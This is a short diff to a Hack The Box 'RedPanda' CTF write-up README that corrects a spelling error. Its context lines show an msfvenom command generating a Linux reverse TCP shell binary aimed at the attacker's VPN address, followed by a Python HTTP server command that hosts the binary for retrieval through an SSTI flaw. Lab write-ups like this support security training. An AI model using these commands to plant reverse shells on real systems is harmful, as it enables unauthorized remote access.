KBSummers/hackthebox_public/machines/RedPanda/README.md

 ```
 $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.xxx.xxx LPORT=443 -f elf > ks.elf #Must supply your IP address (VPN from HTB) for the LHOST parameter
 ```
-Okay so now we have this ks.elf exececutable somewhere on our attaching machine, so we can host an http server in this same directory to access this file from the SSTI:
+Okay so now we have this ks.elf executable somewhere on our attaching machine, so we can host an http server in this same directory to access this file from the SSTI:
 ```
 $ python -m http.server 80 #Make sure this is where your elf binary is
 ```